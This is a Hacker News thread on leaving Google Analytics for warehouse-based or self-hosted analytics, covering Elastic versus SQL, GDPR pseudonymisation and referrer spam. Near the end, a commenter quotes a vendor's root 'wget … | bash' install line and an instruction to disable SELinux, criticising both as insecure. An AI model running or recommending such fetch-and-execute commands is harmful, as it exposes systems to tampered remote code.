Migrating from Google Analytics (thomashunter.name)
352 points by gorkemcetin 14 days ago | 104 comments

If you are thinking of migrating away from GA, I highly recommend you move to a data-warehouse-based solution, where you store each event permanently in a data warehouse like Snowflake or BigQuery. There are two client-side pixels that you can self-host: snowplow.js and Segment. It’s hard to find instructions for self-hosting Segment but I’ve made an example at https://github.com/fivetran/self-hosted-analytics-js

The advantage of doing it this way is you preserve the event level data forever and you can write arbitrary SQL against it. You will need a BI tool to visualize; there are several excellent ones with free or cheap tiers for small companies.

That's the path many data-driven companies take lately. Most companies start with plug-and-play solutions such as GA or Mixpanel but as they start to dig into their customer data, they either hire data engineers or use ETL solutions to collect their raw event data into a data warehouse and BI tools in order to track their own metrics.

That way, you will have more control and be able to ask any question you want. We have been working on a tool that connects to your Segment or Snowplow data and runs ad-hoc analyses similar to Mixpanel and GA, so that you don't need to adopt generic BI tools and write SQL every time you create a new report. I was going to create a Show HN post, but since your comment is quite relevant to the topic, I wanted to share the product analytics tool that we have been working on: https://rakam.io. The announcement blog post is also here: https://blog.rakam.io/update-we-built-rakam-ui-from-scratch-...

P.S. I also genuinely appreciate the work the people at Countly have done. It's often not easy to use ETL tools to set up your own data pipeline and create your own metrics, so they're a great alternative if you don't want to get stuck with GA or third-party SaaS alternatives.

Really wish your landing page had screenshots.

Thanks for the suggestion Thomas. We're rebuilding the landing page at the moment and we will be updating it next week. In the meantime, here is a getting started video: https://www.youtube.com/watch?v=G8Cm5jzYUPw&t=1s

We’re thinking of storing data into Elastic - any thoughts on that approach, or recommendations on how / what to do?

Elastic is great when it comes to storing the log data but since it's not ANSI SQL compliant, it's hard to run complex queries that involve JOINs, WINDOW operations, and subqueries.

Depending on the data volume, you can use one of the SQL-based data warehouse solutions such as Redshift, Presto, BigQuery or Snowflake (even PG works if you have fewer than 100M events per month) and run ad-hoc queries on your raw customer event data easily. It's a bit tricky to run behavioral analytics queries such as funnel and retention, but we provide non-technical-friendly user interfaces that don't require you to write any SQL.
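To give a feel for why funnel queries are "a bit tricky", here is a minimal sketch of a three-step funnel over raw events. It uses Python's built-in sqlite3 module only so that it runs anywhere; the `events` table, its columns, and the event names (`view`, `signup`, `purchase`) are assumptions invented for this example, not the schema of Rakam, Segment, Snowplow, or any particular warehouse.

```python
import sqlite3

# Hypothetical schema: one row per event. Table and column names are assumptions.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE events (user_id TEXT, name TEXT, ts INTEGER)")
conn.executemany(
    "INSERT INTO events VALUES (?, ?, ?)",
    [
        ("u1", "view", 1), ("u1", "signup", 2), ("u1", "purchase", 3),
        ("u2", "view", 1), ("u2", "signup", 5),
        ("u3", "view", 2),
        ("u4", "signup", 1), ("u4", "view", 2),  # signup happened before the view
    ],
)

# Each step keeps only users who reached the previous step earlier in time.
FUNNEL_SQL = """
WITH step1 AS (
    SELECT user_id, MIN(ts) AS ts FROM events
    WHERE name = 'view' GROUP BY user_id
),
step2 AS (
    SELECT e.user_id, MIN(e.ts) AS ts
    FROM events e JOIN step1 s ON s.user_id = e.user_id
    WHERE e.name = 'signup' AND e.ts > s.ts
    GROUP BY e.user_id
),
step3 AS (
    SELECT e.user_id, MIN(e.ts) AS ts
    FROM events e JOIN step2 s ON s.user_id = e.user_id
    WHERE e.name = 'purchase' AND e.ts > s.ts
    GROUP BY e.user_id
)
SELECT (SELECT COUNT(*) FROM step1),
       (SELECT COUNT(*) FROM step2),
       (SELECT COUNT(*) FROM step3)
"""

funnel = conn.execute(FUNNEL_SQL).fetchone()
print(funnel)  # users reaching each step, in order
```

The ordering condition (`e.ts > s.ts`) is what separates a funnel from three independent counts: user `u4` signed up before viewing, so they count for the first step only.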

I would love to talk about your use-case, feel free to shoot an email to emre {at} rakam.io

I do both: use ELK for deep dive on analytics and have a traditional data warehouse for SQL.

Elastic is really good for data exploration. Kibana's discovery page makes it trivial to start diving into your events and gain insights. This is most valuable for large, complex applications where you don't necessarily control the analytics tagging (thus devs can create new tags willy-nilly). It's also easier for non-technical users to get into, since they don't need any sort of SQL experience to build reports.

Elastic is really bad at performing aggregations. You can do it, but they are incredibly memory-intensive, and using them puts the cluster at risk of failure due to out of memory exceptions. It doesn't take many concurrent users for this to be an issue.

Traditional data warehouses are still the best place to get counts though. Assuming your users can write SQL, they can get everything they would want and it will be reliable. Newer databases support JSON structures, so you can even host arbitrary-sized dynamic event data in them like you can with Elastic.

This also depends on why you are choosing this technology - is it part of your existing stack or do you have in-house experts in this tech?

While Lucene syntax is very powerful, it is not SQL as pointed out by the OP. If you have a lot of spare developer time and people skilled in this, it will likely work well for a while (potentially a really long while).

Going with something like BigQuery or Redshift enables you to utilize other tech to supplement or accelerate skill sets, such as paying a SaaS for visualization/analysis tools (Looker, Mode, etc).

In particular, separation of storage and processing helps avoid costs when you are not using the data. With Elastic, I believe you need the cluster whether you are using it or not. BigQuery will only charge you for the compute you use and pennies for storage. Same thing for Athena/Redshift Spectrum. Snowflake is similar, but I believe for enterprise contracts it is a bit more complex, with minimums and such.

Structuring data is another really important consideration - will you need to normalize and will you need to update labels/dimensions? That’s just the start.

> is it part of your existing stack or do you have in-house experts in this tech?

Nope and nope. That's definitely the scary / unknown part!

> If you have a lot of spare developer time and people skilled in this, it will likely work well for a while (potentially a really long while).

We don't have a lot of spare developer time and people. However, the Elastic docs make our fairly straightforward use case - dump lots of events in and filter them by date and about 4 different properties - seem not too daunting.

The way it's sold on the Elastic site these days seems like a very "batteries included" kind of approach - am I interpreting their marketing a little too positively? Are we kidding ourselves? Would love to hear more about your thoughts!

> Structuring data is another really important consideration - will you need to normalize and will you need to update labels/dimensions? That’s just the start.

We don't expect much.

Thanks for mentioning the other technologies, too! The way we're structuring it allows us to either use Elastic, SQL, or something else entirely, so thankfully we're fairly agnostic on the data store. If Elastic turns out to be a time sink, we'll have no hesitation trying something else out.

Just letting you know, your site breaks if a browser does not allow third-party scripts.

Pricing info is a little thin on the ground!

Remember that if you’re storing each event you need to anonymise user-identifying data out of it for GDPR (assuming you have users who don’t consent), and you need to be able to remove (or at least anonymise) the data if consent is withdrawn.

With Google the TOS states that you’re not allowed to store personal information in the first place at least.

The best way to solve this is to have a normalized schema. You assign each user an ID, and then you sync all the identifying information to its own table. So you get a schema that looks like:

  events (id, user_id, ...)
  users (id, first_name, last_name, email, ...)
If a user requests to be deleted from your database, or if you have a policy of deleting users when they cancel their subscriptions, you can accomplish that by deleting one row.

This isn't going to make you GDPR compliant by itself but it's a start.
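As a rough sketch of the "delete one row" idea, using the two-table layout above: the snippet below uses Python's built-in sqlite3 module, and the sample rows, the `name` column on `events`, and the `forget_user` helper are all made up for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users  (id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT, email TEXT);
CREATE TABLE events (id INTEGER PRIMARY KEY, user_id INTEGER, name TEXT);
INSERT INTO users VALUES
    (1, 'Ada', 'Example', 'ada@example.com'),
    (2, 'Bob', 'Example', 'bob@example.com');
INSERT INTO events (user_id, name) VALUES
    (1, 'page_view'), (1, 'signup'), (2, 'page_view');
""")


def forget_user(conn, user_id):
    """Hypothetical helper: drop the one row that holds identifying fields."""
    with conn:  # commits on success, rolls back on error
        conn.execute("DELETE FROM users WHERE id = ?", (user_id,))


forget_user(conn, 1)

remaining_users = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]
# Events for the deleted user are still there, keyed only by the opaque id.
orphaned_events = conn.execute(
    "SELECT COUNT(*) FROM events e "
    "LEFT JOIN users u ON u.id = e.user_id WHERE u.id IS NULL"
).fetchone()[0]
print(remaining_users, orphaned_events)
```

Note that the event rows survive the delete. Whether what remains in them is enough to identify someone is a separate question that this layout does not answer.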

Are the events not enough to re-identify the user? Not having a name literally in the database doesn’t make it anonymous.

As long as events don't have name/email/IP/... there should be no problem as far as I understand it. The regulation targets only personally identifiable information.

PII is a concept in US law. The GDPR uses personal data, defined as:

"any information relating to an identified or identifiable natural person (‘data subject’); an identifiable natural person is one who can be identified, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person"

Pseudonymization (separating unique identifiers from the rest of the datapoints) can and should be used as a safeguard, but doesn't remove the need to protect the data, particularly if you keep a link between the two.

If you were a bookshop and your events log someone anonymous as buying a book on niche topics A, B and C, I reckon that could easily globally uniquely identify me as there aren't many people in the world interested in all three. Then you could also see me buying a book on embarrassing topic D and blackmail me with it. No personal identifying information, but it's not anonymous.
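The bookshop argument can be checked mechanically: count how many pseudonymous profiles share each exact combination of topics, and see who ends up alone. This is only a toy sketch; the purchase log, the ids, and the `unique_profiles` helper are hypothetical.

```python
from collections import Counter

# Hypothetical purchase log with names removed: (pseudonymous_id, topic).
purchases = [
    ("p1", "A"), ("p1", "B"), ("p1", "C"),
    ("p2", "A"), ("p2", "B"),
    ("p3", "A"), ("p3", "B"),
    ("p4", "A"),
]


def topic_sets(rows):
    """Group topics per pseudonymous id."""
    sets = {}
    for pid, topic in rows:
        sets.setdefault(pid, set()).add(topic)
    return {pid: frozenset(topics) for pid, topics in sets.items()}


def unique_profiles(rows):
    """Return ids whose exact combination of topics is shared by nobody else."""
    profiles = topic_sets(rows)
    counts = Counter(profiles.values())
    return sorted(pid for pid, prof in profiles.items() if counts[prof] == 1)


singled_out = unique_profiles(purchases)
print(singled_out)
```

Anyone in `singled_out` is a group of one: an attacker who knows that person's interests from another source can pick out their row, and with it everything else they bought.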

Finger-printing is not PII. And the people blackmailing you because you're interested in both finger painting and the orficial applications of pine cones would not be entirely sure it was you. If they had an email address, name, or IP address with a timestamp, then they could be quite certain that it was you.

> Finger-printing is not PII

I didn’t say it was. The original conversation wasn’t about PII it was about anonymising. Fingerprints defeat anonymisation.

I reckon in practice with for example an Amazon sales log with names removed and my public Twitter feed you could de-anonymise me with a high degree of certainty.

No argument from me, there are things like IPs that are very hard to find every copy of and eliminate. Putting the users in their own table is just a simple best-practice that has a lot of benefits, so it’s a great first step.

I think GA did away with the restriction on PII last year or thereabouts.

No, it’s still there:

You will not and will not assist or permit any third party to, pass information to Google that Google could use or recognize as personally identifiable information

Thanks for correcting my error. Now I wonder what I was thinking? I’m sure there was some change in the policy, I’ll do some research.

On BI solutions, we’ve been using Metabase[1] a lot at work and it’s been fantastic.

[1] https://Metabase.com

Same - we’re getting some great insights from Metabase.

100% recommend the BigQuery and Segment combo. It’s so easy to set up and querying is just SQL. A few annoying issues though: Metabase is brilliant, but doesn’t support BigQuery datasets properly, so we can't really use it. We’re in the process of switching to Tableau for our BQ queries, which allows powerful joins across all sorts of different data sets.

I had a similar issue and switched to https://holistics.io. Working great so far.

I was thinking of using Elasticsearch and Kibana, mostly because I know the stack already. Do you think I should rather look into BigQuery and Segment?

I'm not an expert, but I looked at both BQ and ELK and went with BQ just for ease of ops and the fact we can use SQL, which makes it more accessible to other team members who know SQL.

We're a small startup though, so last thing I wanted was even the slightest ops load from a new system.

We've actually been trying to figure out the best path for this. We have most of our data in Periscope (we're on the Redshift version of it) and we also use GA and it would be great to be able to have everything in one place.

Seems like using Segment here is probably the least effort solution for future events, although it doesn't address ETLing past GA data into the warehouse. Curious if anybody else has had to deal with a similar situation.

We made that exact transition, and the limitation you describe is real - you can’t get anything out of GA, particularly at the granularity you’ll have with an alternative.

So it’s best to start early, because it’s a slow process.

It’s even slower if you don’t instrument the right events in the beginning, because you’ll wait a while to gather enough event data to perform an analysis, find you want to track some new event, and then need to wait even longer to have enough data for analysis. It can be frustrating, and a surprising amount of work.

If you want to build out your BI infrastructure in the meantime, you could always ETL your server logs, for example, into the data warehouse as a stopgap. It’s definitely not the same as the customer-centric setup that you get with Segment, though, unless you have some advanced logging already set up.

Are you a paid GA user? If that's the case, you can ingest your data into BigQuery. Otherwise, you can't export the raw data; the only option is to export the summary data (number of unique users per hour, day, week etc.) from GA to your Redshift cluster via an ETL tool such as Segment.

We are not a paid user. I believe that's around 200k a year? That's a good point, I haven't looked into paid vs unpaid functionality when it comes to data export yet.

I run data science in a company that publishes email newsletters. We store every delivery and event record as a row in our database. This gives us so much flexibility.

> there are several excellent [BI tools] with free or cheap tiers

Would love a recommendation or two.

I've used Redash [1] and Saiku [2] with good success. Redash is a Swiss Army knife approach to dashboarding: it can run and schedule queries against a plethora of data sources and visualise the results in different ways.

Saiku uses Mondrian (OLAP) tech to give a slice/dice drill-down view of data. Unfortunately the docs for Saiku seem very disjointed these days, but there's a Docker image for the CE (Community Edition) that I recently set up okay. There's quite a learning curve in setting up Mondrian schemas, but it's worth it when it's done.

[1] https://redash.io [2] https://www.meteorite.bi/products/saiku

Metabase is OSS and can run on Heroku. Tableau isn’t too badly priced for one license. But that’s about it - I’ve done a lot of research recently.

Nice post! I have been thinking much about this for my own written works...

My strange conclusion was to not capture analytics at all. My loose metric is now: which posts inspire people to email me directly?

I have decided I do not want to know what you read, how long you read it, where you came from... Only whether or not you felt something. And data will not tell me this.

Interesting! I was reading all the comments, wondering if anyone would express the concept that maybe, just maybe, all of this might not be that useful after all.

More specifically, how often does all of this really need to be down to the individual person (or IP address) at all? Even if you know that piece of information at an ephemeral level, my own suspicion is that aggregate data should be sufficient for any non-creepy use case.

Perhaps one way to phrase the question: how would having personal-level details in the analytics change the actions you might perform based on available data?

I think it's great we are moving away from big data collectors and running our own servers. What I usually see is people storing their users' data on servers that are situated in locations where governments can get access to the data on the servers without the owner knowing about it. It's maybe going far in protecting the privacy of your users, but it's something a lot of solutions on the internet don't think about.

That's why I moved Simple Analytics' (https://simpleanalytics.io) servers to Iceland where the law will forbid peeking in data before actually informing the owner of the server. I encrypted my server so if anything happens I can just turn it off and it will be nearly impossible to get any user data.

> I encrypted my server

Could you please share which Iceland host you are using? Also, what is the process you're following to encrypt your server?

I'm using 1984 [1]. I'm writing a blog post on this soon [2], but in short: I use Ubuntu Server with LVM [3], unlock my system via Dropbear SSH (a very small SSH server and client) [4], and moved the entry point of incoming data to another server, which stores the incoming data only when the main server is down. This is because I want to keep recording incoming data, and my encrypted server can't boot without me entering a password. So in case of a power failure, the data of my customers will still be recorded.

[1] https://1984.is

[2] https://blog.simpleanalytics.io

[3] https://en.wikipedia.org/wiki/Logical_Volume_Manager_%28Linu...

[4] https://matt.ucc.asn.au/dropbear/dropbear.html

Good to see new tooling on analytics. Another alternative is Matomo (Piwik, formerly) https://github.com/matomo-org/matomo

Maybe not very new, as Countly has been around for 7 years :-)

But no one has ever heard of it or recommended it on popular Internet forums (there have been various submissions, but they never gained any traction).

One reason could be that Countly doesn't offer transparent pricing. People tend to switch off when they see "call for a quote".

More than 15000 mobile apps are already using it, Gartner recommends it - but you are right - more traction is always better. Re transparent pricing, it is a complicated process when you sell an enterprise product with many addons, support options, configurations etc, that is why on-prem customizable solutions don't usually have price tags.

Good stuff, using Matomo for my sites too. Haven't heard about Countly so that was interesting to learn too!

> Which pages were featured and on which social media platforms?

This was the “killer feature” of the Google Analytics replacement I built for myself a few years back. I would grab referrers for social and scrape them to give a more useful report of the source of traffic.

Unfortunately this is challenging or impossible for many social platforms due to HTTPS everywhere, the prevalence of outbound link scrubbing, and app-driven embedded web views.

I still think it would be a killer feature to know who tweeted you out or which subreddit you are trending on but it’s just not feasible to do based on a website pixel alone.

How does https stop this? I understand many websites will redirect before loading a link to clear the referrer data which is a good thing since the referrer header has been abused far too much.

I imagine originally its intent was for website owners to see what other websites linked to them but now it gets used to track the users

I always like to hear about new (to me) analytics options. Currently I use GA + Clicky, and I've considered getting rid of GA for a while. One option that looks attractive is Fathom, which can be used either as a SaaS or self-hosted, and is more focused on privacy than most.

Clicky: https://clicky.com

Fathom: https://usefathom.com/

I have always wondered: either something is dodgy about Clicky, or the others are really expensive. Clicky can do a million page views for $20/month, while others, even simple ones that aren't as feature-rich such as Fathom, charge anywhere from $29 or $50 up to over $250 per month for Matomo.

What's the catch?

Check whether your analytics vendor can do drilling and segmentation, and lets you dig into raw data. If that is possible (which is a hard thing to implement), then costs are way higher.

I've just rewritten my 2-year-old https://trackingco.de/.

Enterprise-grade email analytics: https://mailspice.com

I have the same concerns with Google Analytics and tried to install Matomo [1] for my personal website [2] a few months ago. It seems a more robust tool than Countly [3] to me, but maybe I'm wrong.

But I had an error installing Matomo and got no help in the official forum [4]. If someone here can help me I would appreciate it; I'm not a developer (I'm also considering getting rid of analytics tools for good, anyone?). Thanks.

[1] https://matomo.org/

[2] https://pablomassa.com/

[3] https://count.ly/

[4] https://forum.matomo.org/t/fatal-error-on-installation/29949

From [4] I learn:

"I have a Hostgator shared hosting with PHP 5.5."

PHP 5.5 has been EOL since mid-2016. Can't you switch to a newer version such as 7.2?

Matomo itself does not even display the required version according to [1]. Their FAQ talks about 5.3 - which is horribly ancient too.

[1] https://matomo.org/docs/installation/


I have to agree that one should be using PHP 7.2. It also gives a nice performance boost to Matomo. The required PHP version for Matomo is shown in [1] (5.5.9 or greater). Can you please send me a link to the FAQ page mentioning 5.3 (e.g. to lukas@matomo.org) so it can be updated?

[1] https://matomo.org/docs/requirements/

My mistake, I was skimming the docs only but overlooked the specially linked requirements. I would go further though and remove outdated PHP versions from that page and only recommend maintained versions.

Additionally, the error described by OP looks like autoloading is broken.

Thanks! I found out how to upgrade to 7.2 [1]. Will try it again!

[1] https://support.hostgator.com/articles/php-configuration-plu...

This project used to be called Piwik. 10 years later and they still only support MySQL; a lot of people really wanted at least Postgres support.

I've been playing with Matomo recently and opted to use a premade container [1] for it and that was working pretty well.

[1] https://github.com/crazy-max/docker-matomo

Anyone else miss Urchin? Google bought them and used it to build Analytics. For me at least, Urchin was vastly superior. I feel like Analytics is built for sites that run Google Ads to sell more ads. Urchin was for people who ran websites who wanted to learn more about their site and readers.

I loved the hosted version of Urchin that processed web server logs locally (or would grab them remotely with ssh/sftp/ftp). A shame that product was deprecated post-acquisition.

My favorite analytics tool was Mint from Shaun Inman.

I always reminisce about it when I see that urchin.js snippet..

It was superior. Oftentimes, when people ran into a wall within GA, they would flock to Urchin and its fairly reasonable price.


> What posts are popular this week?

> How is the site doing compared to last week?

If this is really all the information you need, try out a server-side solution like GoAccess [0]. It is a little bit harder to set up than copy&pasting an HTML snippet, but it is well worth it (privacy, performance, etc).

[0] https://goaccess.io/
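For the two quoted questions, the core of a log-based answer fits in a few lines. The sketch below is not how GoAccess works internally; it is a toy illustration that assumes access logs in the Common/Combined Log Format and counts successful GET requests per path. The sample lines and the `top_pages` helper are made up.

```python
import re
from collections import Counter

# Matches the quoted request and the status code of a Common/Combined Log Format line.
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')


def top_pages(lines, limit=3):
    """Count successful GET requests per path, ignoring query strings."""
    hits = Counter()
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m["method"] != "GET" or m["status"] != "200":
            continue
        hits[m["path"].split("?", 1)[0]] += 1
    return hits.most_common(limit)


sample = [
    '203.0.113.5 - - [10/Oct/2018:13:55:36 +0000] "GET /posts/a HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Oct/2018:13:56:01 +0000] "GET /posts/a?utm=x HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2018:13:57:12 +0000] "GET /posts/b HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Oct/2018:13:58:40 +0000] "GET /missing HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2018:13:59:02 +0000] "POST /login HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

popular = top_pages(sample)
print(popular)
```

A real tool also has to deal with bots, static assets, and log rotation, which is where something like GoAccess earns its keep.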

The challenge with any server-side solution is the huge amount of caching that takes place within the web infrastructure. Many sites sit behind CDNs, but even without CDNs, many ISPs and enterprises run their own caching proxy servers on the edge of their networks. Browsers also have their own caching of recent pages. The result of all the caching is that it is possible that very few of the visitors actually connect to the origin server.

For that reason, most analytics systems use some kind of client-side tracking code that runs within the client web browser. That way it works regardless of whatever caching happens.

Server-side analytics is not a silver bullet, but it's great for the quoted use case. While it has the mentioned disadvantages, so do client-side solutions. Many people run adblockers and it's easy - sometimes even a default - to simply block Google Analytics & co. So yes, if you really need exact statistics, you should probably run both client-side and server-side analytics. But for a rough "what's popular?" estimate, there's no need to impose (one more) JS file on your users. I switched from GA to GoAccess a few years ago (running both for a few months), and while the absolute numbers were off by ~10%, the ratio was almost the same. But then again, I'm just running a blog and not a business.

That's a great migration for the open-source community. As Thomas mentioned in his post, Google is a cornerstone of the "centralized internet" and we should make these kinds of migrations to stop them. #2pac

I'm curious how these alternative options (Countly, Matomo, Snowplow, etc.) handle fake referral traffic compared to how Google Analytics handles it.

Has Google Analytics finally begun blocking referrer spam? I know Piwik/Matomo have been doing this by default for a while: https://matomo.org/blog/2015/05/stopping-referrer-spam/

The blacklist is on GitHub and is useful for other analytics software, such as GoAccess which is what I use.

Not well! Your best bet is to

  * Sync your (snowplow, segment, ...) data to a data warehouse
  * Try to clean up your data with SQL
  * Keep running GA so you can compare your numbers to GA

That's exactly what we do. Snowplow does a good job, but having the comparison points in GA is very helpful.

That may be a helpful open source machine learning project for a self-hosted analytics system perhaps.

Matomo uses a simple community-contributed list [1] of domains that were reported by multiple people to create referrer-spam.

Of course you can use the same list for every other software.

[1] https://github.com/matomo-org/referrer-spam-blacklist/blob/m...
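Reusing such a list in your own pipeline could look roughly like this. The sketch assumes the list is plain text with one domain per line; the domains below are placeholders rather than entries from the real list, and `load_blocklist` and `is_spam_referrer` are hypothetical helpers.

```python
from urllib.parse import urlsplit


def load_blocklist(text):
    """Parse a one-domain-per-line list, skipping blank lines."""
    return {line.strip().lower() for line in text.splitlines() if line.strip()}


def is_spam_referrer(referrer, blocklist):
    """True if the referrer's host, or any parent domain of it, is listed."""
    host = (urlsplit(referrer).hostname or "").lower()
    parts = host.split(".")
    return any(".".join(parts[i:]) in blocklist for i in range(len(parts)))


# Placeholder entries standing in for the community-maintained list.
blocklist = load_blocklist("spam-example.test\n\nbad-referrer.example\n")

referrers = [
    "http://www.spam-example.test/page",
    "https://news.ycombinator.com/item?id=1",
    "",
]
clean = [r for r in referrers if not is_spam_referrer(r, blocklist)]
print(clean)
```

Checking parent domains means a listed `spam-example.test` also catches `www.spam-example.test`, at the cost of a few extra set lookups per referrer.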

Is there a privacy-friendly analytics tool that does not set cookies and store data forever? I don't really care about perfect user analytics, just good enough. Maybe by analysing logs. In the 90s there were a lot of good tools like this, but now everybody has gone cloud. I can't imagine the tools offered today are compatible with GDPR.


You can configure Matomo [1] to both not use any cookies [2] and to automatically delete just the raw data or all data that is older than x months. Log Analytics is also possible.

If you want something that is far more minimalistic, but also Open Source and self-hostable, you can take a look at [3]. (Not sure about how they use cookies)

(Disclaimer: I am part of the Matomo team)

[1] https://matomo.org/ [2] https://matomo.org/faq/general/faq_157/ [3] https://usefathom.com/

Countly (if you want) can be configured so it doesn't set cookies [1]

You can also configure to remove any data older than N days/months.

It is also GDPR compliant [2]

[1] https://resources.count.ly/docs/countly-sdk-for-web#section-...

[2] https://resources.count.ly/docs/compliance-hub

https://GoAccess.io is great for analysing access logs.

That said, there are solutions where a cookie allows for greater privacy because it allows you to leave sensitive data on the client versus having to store it on the server. For example, https://usefathom.com/ is an open-source self-hosted analytics tool that uses a cookie to enhance privacy.

I work on https://getmirrorshades.com It doesn’t use cookies. Data is aggregated immediately and purged on a tight schedule. May be worth seeing if it is sufficient for your use case.

Lately I've been pondering whether client-side analytic scripts generate truncated data by design? That is, a payload goes to the client but before a response can be sent to some backend server the client terminates (one example being a tab close) before the analytic code finishes. If this is the case my understanding is that it'd result in an unknowable underestimation of http responses. I'm still exploring the space and would be interested to know if others had thought about this?

There is a browser API called Beacon whose purpose is to address this specific edge-case. Google Analytics supports it as an option.


Most analytics providers have JS SDKs that persist the data to localStorage. When the user comes back to the webpage, the SDK tries to send the persisted data to the server. It's not an ultimate solution but it usually covers most of the cases where Beacon support is not available.

A small point (although I don't claim it militates against the central impulse of the article) is that serving analytics.js through gtag.js is obviously going to inflate the tag size unnecessarily. The latter is a unified interface for all of Google's various page snippets. Also, though not recommended, there's no reason you can't self-host GA, although practically speaking Google-hosted GA is likely cached more often and served from pretty snappy geolocated servers.

Is anyone using Yandex.metrica? It seems to offer a lot of features and is even completely free. But nobody seems to be talking about it. Where is the catch?

Considering GA is blocked by every adblocker I wouldn't rely too much on it anyway.

Hmm. Most viewed pages, time spent... okay.

But GA provides segments that marketers need. How do you get that kind of data without Google or the FB pixel?

Any interest in helping me build a countly alternative?

I think there is but what would you make different?

Not have a 1 liner installation script that's a security nightmare? :)

eg, this is the Countly one (specifically run as root):

  wget -qO- http://c.ly/install | bash
If someone manages to break into the c.ly redirection service, or the website/CDN/etc serving that, new users would likely be in for a bad time. And the problem could be very subtle, if it's done by someone clueful.
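One common mitigation is to download the script, review it, pin its hash, and refuse to run anything that doesn't match. The thread doesn't say whether Countly publishes a checksum, so the pinned digest below is purely hypothetical: it is computed from a stand-in script just so the sketch runs.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Hex-encoded SHA-256 digest of the given bytes."""
    return hashlib.sha256(data).hexdigest()


def is_trusted(script: bytes, pinned_sha256: str) -> bool:
    """Compare the script's digest to a pinned value obtained out of band."""
    return hmac.compare_digest(sha256_hex(script), pinned_sha256.strip().lower())


# Stand-in for an installer you have downloaded and actually read.
reviewed_script = b"#!/bin/sh\necho 'installing'\n"
# In practice this would be a hard-coded constant recorded after the review.
PINNED_SHA256 = sha256_hex(reviewed_script)

# What a compromised redirect or CDN might serve instead.
tampered_script = reviewed_script + b"curl http://attacker.invalid/x | sh\n"

print(is_trusted(reviewed_script, PINNED_SHA256))
print(is_trusted(tampered_script, PINNED_SHA256))
```

This only helps if the pinned value reaches you over a different channel than the script itself; a hash served from the same compromised host proves nothing.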

Just for added er.. goodness (/s), the Countly instructions also need people to:

  Disable SELinux on Red Hat or CentOS if it's enabled.
  Countly may not work on a server where SELinux is enabled. 
  In order to disable SELinux, run "setenforce 0".

Waiting for new tools. Will see how accurately they work compared to Google Analytics.

A good one..!! Everything has some advantages and some disadvantages.

Is there any cookieless analytics solution?

Matomo can be set up for cookieless tracking. It will of course impact some metrics. More here: https://matomo.org/faq/general/faq_157/

You can disable cookies in Matomo.


Yes, most of the analytics platforms out there can work without a cookie, including Countly.

The only advantage is that it weighs less?

I don't feel convinced to switch :(

The advantage is that you're not selling out your users' browsing habits to the biggest surveillance company in the world.

That your pages are now lighter too is just a bonus.

Why countly and not piwik?

Yeah, it's crippleware. Anything good is paid-for.

What is crippleware? GA?


Google definitely takes money for GA for large sites
